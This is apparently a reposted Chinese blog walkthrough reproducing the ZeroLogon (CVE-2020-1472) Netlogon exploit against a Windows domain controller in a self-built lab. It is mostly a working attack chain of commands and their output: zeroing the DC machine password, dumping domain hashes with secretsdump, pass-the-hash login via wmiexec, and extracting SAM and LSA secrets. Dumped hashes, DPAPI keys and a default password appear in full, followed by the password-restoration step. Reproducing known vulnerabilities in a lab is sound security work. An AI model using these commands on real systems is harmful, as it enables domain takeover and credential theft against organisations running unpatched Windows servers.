微軟NetLogon權限提升 CVE-2020-1472 漏洞復現

簡介

NetLogon 遠程協議是一種在 Windows 域控上使用的 RPC 接口,被用於各種與用戶和機器認證相關的任務。最常用於讓用戶使用 NTLM 協議登錄服務器，也用於 NTP 響應認證以及更新計算機域密碼

微軟MSRC於8月11日 發布了Netlogon 特權提升漏洞安全通告。此漏洞CVE編號CVE-2020-1472， CVSS 評分:10.0。由 Secura 公司的 Tom Tervoort 發現提交並命名為 ZeroLogon

攻擊者使用 Netlogon 遠程協議 (MS-NRPC) 建立與域控制器連接的 Netlogon 安全通道時，存在特權提升漏洞。當成功利用此漏洞時，攻擊者可無需通過身份驗證，在網絡中的設備上運行經特殊設計的應用程序，獲取域控制器的管理員權限。

影響范圍

Windows Server, version 2004 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)

步驟思路

利用EXP置空域控密碼-獲得用戶hash-通過hash取得一個shell-獲得機器保存的原hash-通過獲得的hash恢復置空域控密碼

自行本地組建域環境

POC驗證

https://github.com/SecuraBV/CVE-2020-1472  

EXP攻擊

注意這里請先安裝impacket，不然EXP很大概率是會產生報錯的
如下圖用setup安裝即可

EXP自行下載
https://github.com/dirkjanm/CVE-2020-1472   
先將域控密碼置空
python3 cve-2020-1472-exploit.py OWA2010SP3 192.168.3.142

獲得域控上的hash如下：
python3 secretsdump.py 0day.org/OWA2010SP3$@192.168.3.142  -no-pass
這里如果不置空密碼nopass其實是不會成功的，文末恢復上密碼時候有對比

一大把各種hash

利用獲得的用戶hash來登錄域控：
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c 0day.org/sqladmin@192.168.3.142
相關命令執行如下

導出sam等文件到本地，獲得域控上邊本地保存的置空前的hash

通過sam等文件獲得原ntlm hash：
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

[*] Target system bootKey: 0xe2daa1c5dca47d980c9c9a95b0409760
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:dbf5b27ba7b68e257e11b31854d6f6069746b88cca37879f11c3cc3fae38012b47df0a003ab2ff2ed3672ead8b61a232b8f562b61e28bbf8562dd797ce5439fd45e75daeb1b8467ce9805bdcb76093cf6cef8bc308a679e8688bb2f0f6256c14cbbdb1e48f320ebf2c34e667db98d399ea3f02854893cbffffd0613312a3b5b4806cee2534669871e8370d5729912e43456c627799f7b539b056094724a84340aa1ee317398f86f8956364d398d45a46d9c75d57c43ee9ea839a0587b5b16728e8bedce420a27c6e9f4a6d1face53e757e275edef3159e32712b03c8f65818bd3093ac630dbf7fb1477392acf4084695
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:91f32f0af885207c73f094618f1f42bf
[*] DefaultPassword
(Unknown User):ROOT# 123
[*] DPAPI_SYSTEM
dpapi_machinekey:0x7f62c3d11ca85ac5abf5bd5adf7e3dd5b85fe81b
dpapi_userkey:0xf89205346bcaf0c5aef5933db269de40fd2f3077
[*] L$ASP.NETAutoGenKeys2.0.50727.5420
 0000   79 97 4E F4 29 D1 DA DF  C0 C5 63 ED 04 9C C7 05   y.N.).....c.....
 0010   92 07 C5 0F 31 B0 A2 9B  8B 40 A7 5D 75 E1 43 AA   ....1....@.]u.C.
 0020   25 78 D0 DB 96 47 82 8A  C7 AD 24 0D AF B7 B1 51   %x...G....$....Q
 0030   AB B0 59 02 63 A3 03 58  65 14 FC C2 30 93 A1 DA   ..Y.c..Xe...0...
 0040   3D B1 8E C3 79 60 F6 86  A4 1C 02 77 A2 A8 CC D1   =...y`.....w....
 0050   EB AE A9 8B 07 7E 71 C0                            .....~q.
L$ASP.NETAutoGenKeys2.0.50727.5420:79974ef429d1dadfc0c563ed049cc7059207c50f31b0a29b8b40a75d75e143aa2578d0db9647828ac7ad240dafb7b151abb0590263a303586514fcc23093a1da3db18ec37960f686a41c0277a2a8ccd1ebaea98b077e71c0
[*] NL$KM
 0000   63 26 83 D5 19 BE 92 EE  D2 08 87 7D 9B A6 35 16   c&.........}..5.
 0010   7F A7 E8 ED 0B 0E 8B A8  DF 33 35 89 F6 71 C3 53   .........35..q.S
 0020   5A 1E B2 91 CA 68 F2 E4  FD 57 D8 0F 5C 4E 1B 8C   Z....h...W..\N..
 0030   41 FB 71 8C 5E 83 B3 FB  D4 E0 5D F0 90 90 50 EE   A.q.^.....]...P.
NL$KM:632683d519be92eed208877d9ba635167fa7e8ed0b0e8ba8df333589f671c3535a1eb291ca68f2e4fd57d80f5c4e1b8c41fb718c5e83b3fbd4e05df0909050ee
[*] Cleaning up...

恢復原hash，如下鏈接工具即可
https://github.com/risksense/zerologon

恢復前與恢復后對比：

E:\Python36\impacket-master\examples>python3 secretsdump.py 0day.org/sqladmin:admin!@#45@192.168.3.142 -just-dc-user OWA2010SP3$
Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
OWA2010SP3$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Kerberos keys grabbed
OWA2010SP3$:aes256-cts-hmac-sha1-96:e80b9eb05118d4a05086fd34d1c3577602f7332fe61d0498a9ec45a23ec1e5f8
OWA2010SP3$:aes128-cts-hmac-sha1-96:be60933a403c732355cca898940f6d7d
OWA2010SP3$:des-cbc-md5:0dbc7c3279fed98f
[*] Cleaning up...

E:\Python36\impacket-master\examples>python3 secretsdump.py 0day.org/sqladmin:admin!@#45@192.168.3.142 -just-dc-user OWA2010SP3$
Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
OWA2010SP3$:1000:aad3b435b51404eeaad3b435b51404ee:91f32f0af885207c73f094618f1f42bf:::
[*] Cleaning up...

E:\Python36\impacket-master\examples>

確認恢復后同樣姿勢已無法獲得域控hash：

E:\Python36\impacket-master\examples>python3 secretsdump.py 0day.org/OWA2010SP3$@192.168.3.142  -no-pass
Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up...

E:\Python36\impacket-master\examples>

感謝大佬們閱讀，向大佬們學習

轉發請加原文鏈接https://www.cnblogs.com/Yang34/p/13678632.html